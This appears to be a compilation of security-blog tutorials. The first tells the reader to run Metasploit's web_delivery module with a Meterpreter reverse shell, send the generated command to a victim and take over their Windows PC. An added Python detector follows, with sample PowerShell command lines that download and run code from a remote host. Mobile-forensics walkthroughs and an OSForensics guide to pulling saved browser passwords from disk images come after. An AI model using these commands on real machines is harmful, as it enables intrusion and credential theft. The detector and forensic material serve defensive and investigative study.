Hack Remote Windows PC using Script Web Delivery

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.108 (IP of Local Host)
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>exploit


Copy the highlighted text shown in the window below and send it to the victim.


When the victim pastes the highlighted text into a command prompt and runs it, you get a Meterpreter session on the victim system.


Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
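Seen from the defender's side, the delivery command described above starts powershell.exe, fetches a script over HTTP and evaluates it in memory, so the process command line is where it becomes visible. The following is an added example, not part of the original article: the sample events are constructed (URLs defanged), and the function and tag names are assumptions of this example.

```python
import re

# Constructed process-creation events (image path, command line); URLs are defanged.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient)"
     ".DownloadString('hxxp://192.0.2.10:8080/[redacted]'))"),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -WindowStyle Hidden -Command $c=New-Object "
     "System.Net.WebClient; iex $c.downloadstring('hxxp://192.0.2.10:8080/[redacted]')"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\Scripts\backup.ps1"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -Command Invoke-WebRequest -Uri hxxps://example.invalid/t.zip "
     r"-OutFile C:\Temp\t.zip"),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c ipconfig /all"),
]

INTERPRETER = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
FETCH = re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I)
EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
URL = re.compile(r"h(?:tt|xx)ps?://", re.I)  # also accept defanged hxxp
HIDDEN = re.compile(r"(?<!\S)-w(?:in(?:dowstyle)?)?\s+hidden", re.I)

def classify(image, cmdline):
    """Return tags for a fetch-and-run-in-memory PowerShell launch, else []."""
    if not INTERPRETER.search(image):
        return []
    # Require all three: a network fetch, a URL, and in-memory evaluation.
    if not (FETCH.search(cmdline) and URL.search(cmdline) and EXEC.search(cmdline)):
        return []
    tags = ["download_and_execute"]
    if HIDDEN.search(cmdline):
        tags.append("hidden_window")
    # 32-bit interpreter on a 64-bit host, as the article notes for x86 payloads.
    if "\\syswow64\\" in image.lower():
        tags.append("wow64_interpreter")
    return tags

def detect(events):
    """Return (index, tags) for every event that classify() flags."""
    scored = ((i, classify(img, cmd)) for i, (img, cmd) in enumerate(events))
    return [(i, tags) for i, tags in scored if tags]

if __name__ == "__main__":
    for idx, tags in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx][0], tags)
```

Feed it the image and command-line fields from process-creation logging, for example Sysmon event ID 1 or Windows event 4688 with command-line auditing enabled.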

Forensic Investigation of Any Mobile Phone with MOBILedit Forensic

With MOBILedit Forensic you can view, search or retrieve all data from a phone with only a few clicks. This data includes call history, phonebook, text messages, multimedia messages, files, calendars, notes, reminders and raw application data. It will also retrieve all phone information such as IMEI, operating systems, firmware including SIM details (IMSI), ICCID and location area information. Where possible MOBILedit Forensic is also able to retrieve deleted data from phones and bypass the passcode, PIN and phone backup encryption.

Note: USB Debugging must be enabled.

Download MOBILedit! Forensic from here and install it on your PC. Now click on MOBILedit! Forensic.

Click on the Connect option. The MOBILedit! Forensic Wizard will run and ask for Phone, Data file or SIM Card. Select the Phone option and click on Next.



Now it will ask for type of connection. Select Cable Connection. And click on Next.


Now follow the instructions such as install Driver or turn on USB debugging if connecting Android.
Now connect the phone via data cable. If prompted choose connection mode to PC Sync or COM port. Click on Next Option.


It will show the connected mobile. Check your Mobile model and click on Next.


To take the Backup, first of all enter Owner Name, Device Evidence Number and Owner Phone Number.
Click on Browse Option to select the path folder where backup data will be stored and click on Next.


Now it will ask which part of the file system to back up. Choose Whole File System or Specified File Types such as Audio, Video or Pictures. Then click on Next.


Now it will show the progress bar for Back Up and after completion click on Next.


Now select the check box for Phone memory extraction and click on Next.


Now it will show the message for creation of memory dump on memory card file. Click on Next.


Now select the group….Cases to organize device data or click on <New Case> to create a new case and click on Next.


If we have selected the New Case option, it will ask for the Case Number and investigator details. Enter the investigator details and click on Next.


Now select the Template for Data Export and Click on Finish.



Now it will show the generated Forensic Report.


Select Connected Device Option.


Now it will generate a report with all the details such as Phone book, Call logs, messages, Files etc.


To get phone book details, select Phone book option.


Now you can select a sub option such as WhatsApp to see WhatsApp messages.


Click on Call Logs to see Missed Calls, Outgoing calls and Incoming calls.


Now Click on Messages to see all received, sent and draft messages.


Click on Application Data to get all the details about content providers.


Click on Application to see all the installed Apps in Mobile.


Select Files Option to see all the details about system files in Mobile.


Now Click on Media and select internal media or user media and then select pictures option to see Pictures.


To view the user's files, click on the User Files option.

Android Mobile Device Forensics with Mobile Phone Examiner Plus

AccessData (AD) Mobile Phone Examiner Plus (MPE+) is a powerful mobile device data review tool that can be used in the field as part of a mobile field unit or in the lab. Additionally, data extracted from mobile devices using MPE+ can be easily imported into an FTK case, which offers more in-depth drill-down, categorization, full-text index searching, and all of this is right alongside other digital evidence collected for a case. MPE+ can extract information such as phone and address book data, media files, call logs, SMS and MMS messages, calendar, and file system data stored in the memory of a mobile device.

Download MPE+ from here and install it on your PC.


Now Double click on MPE+ Icon to open it.


Note: USB Debugging must be enabled.

Now select the Drive Management option from Home tab.

To install the mobile driver in your system, click on download option from the given list.
It will install the driver. Click on Select Device.


Now enter the Manufacturer and Model No of the mobile. Click on Connect.


Now select the mobile android version and click on finish.


It will display the message: Connecting to Android Device.


Now it will show the Select Data for Extraction Pop Up. Click on Select All Option and select Extract Option.



It will show the Progress Bar for Android Logical Device Data Extraction.


Now click on Device Information, it will show all the details about the Android Mobile.


Select Call History Option to see all incoming and outgoing call details with duration as well as date and time.



To view all the contacts in the mobile, select Contacts option.


To get all the SMS messages, Select SMS Option.


To see how many android packages have been installed, select Android Packages.


To see all the connected Bluetooth devices, click on Bluetooth Devices Option.


To get the information about the WIFI connections connected with this android mobile, select WiFi Hotspots.


To see the bookmarks, click on WEB option and then select Bookmarks Sub option.


To get Browser History, Click on Web Option and select Browser History Sub option.


To see all the images existing in the Android Mobile from different resources, select Media option and click on Image Sub option.


To get the information about all video files, Select Video sub option from Media Option.

How to Retrieve Saved Password from RAW Evidence Image

First download OSForensics from here and install it on your PC, then open OSForensics and click on the Create Case button to create a new forensic case.


Now enter the details such as Case Name, Investigator Name, Default Drive, and Acquisition Type. To specify the case folder, click on Browse and select the location where you want to save your evidence report. Now click on OK.


Now it will show us the registered case in this tool. Now to manage this case, click on Add Device option available in Manage Case.


Now select Image File option in Select Device to add option. Now assign the path of the folder where image file exists and also give the Display Name which is compulsory. Click on OK Button.


Now, to get the saved browser passwords, click on the Find Browser Passwords option, select the Scan Drive option and then click on Retrieve Password. It will show you all saved passwords in the RAW image.